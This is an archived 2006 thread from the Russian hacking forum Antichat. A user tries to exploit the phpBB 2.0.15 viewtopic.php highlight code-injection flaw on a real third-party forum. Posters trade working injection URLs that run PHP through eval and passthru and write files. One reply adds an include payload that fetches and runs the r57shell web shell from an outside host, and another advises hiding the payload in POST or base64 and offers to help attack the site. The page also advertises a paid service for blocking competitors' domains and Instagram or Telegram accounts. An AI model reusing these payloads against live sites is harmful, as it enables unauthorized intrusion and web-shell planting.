Форум АНТИЧАТ - Вопрос по уязвимости в viewtopic.php

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос по уязвимости в viewtopic.php

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по уязвимости в viewtopic.php

27.08.2006, 20:17

MaddyMan

Новичок

Регистрация: 31.08.2005

Сообщений: 3

Провел на форуме:
10332

Репутация: 0

Вопрос по уязвимости в viewtopic.php

somesite.ru
Вчера залез посмотреть про хитмана и обнаружил, что форум phpbb 2.0.15 .. =)
эксплоит работает, а fopen() и т.д. - нет.
делал так: viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight=' .eval($_GET[c]).'

ничего не работает, что посоветуете?

пробовал это же на локалхосте - гуд, почему там не работает?

кстати, там виндовс стоит - 2003 сервер, скорее всего
&highlight='.passthru(dir).' не пашет тоже.

[mod] Ссылки только в личке и Просьбах о взломах [/mod]

Последний раз редактировалось Azazel; 28.08.2006 в 18:52..

28.08.2006, 00:58

Ch3ck

Познавший АНТИЧАТ

Регистрация: 09.06.2006

Сообщений: 1,359

Провел на форуме:
5301021

Репутация: 1879

viewtopic.php?t=2206&highlight='.passthru(dir).'А может вот так правильней будет?

28.08.2006, 02:14

k1b0rg

Тут может быть ваша реклама.

Регистрация: 30.07.2005

Сообщений: 1,243

Провел на форуме:
4520553

Репутация: 1316

viewtopic.php?t=2206&c=$f=fopen(./images/avatars/images.php,w);fwrite($f,"phpinfo();");&highlight=' .eval($_GET[c]).'

никогда так не делай.
Такие данные шли постом, а лучше в base64.
давай сцылку на форум, поможем

28.08.2006, 18:43

MaddyMan

Новичок

Регистрация: 31.08.2005

Сообщений: 3

Провел на форуме:
10332

Репутация: 0

Я же написал в начале - somesite.ru - форум "нового диска" =)

[mod] Ссылки только в личке и Просьбах о взломах [/mod]

Последний раз редактировалось Azazel; 28.08.2006 в 18:52..

28.08.2006, 18:47

MaddyMan

Новичок

Регистрация: 31.08.2005

Сообщений: 3

Провел на форуме:
10332

Репутация: 0

Цитата:

Сообщение от Dr.Check

viewtopic.php?t=2206&highlight='.passthru(dir).'А может вот так правильней будет?

попробуй сам - не пашет

кроме phpinfo(); и раскрытия пути работает только эксплоит про пасс к базе форума

Последний раз редактировалось MaddyMan; 28.08.2006 в 19:31..

01.09.2006, 20:40

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

Провел на форуме:
2320925

Репутация: 1348

viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://rst.void.ru/download/r57shell.txt

Если не получится пробуй багу с регэкспами.

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

Последний раз редактировалось 1ten0.0net1; 01.09.2006 в 20:42..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Proxy FAQ	foreva	Чужие Статьи	12	04.01.2008 12:15
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Форумы	14	19.04.2006 19:40
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48
Действующие уязвимости почтовых систем РФ	Maxmen	E-Mail	16	12.12.2004 16:48
Вопрос про уязвимости в FastBB	deo	Форумы	9	29.11.2004 09:47

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход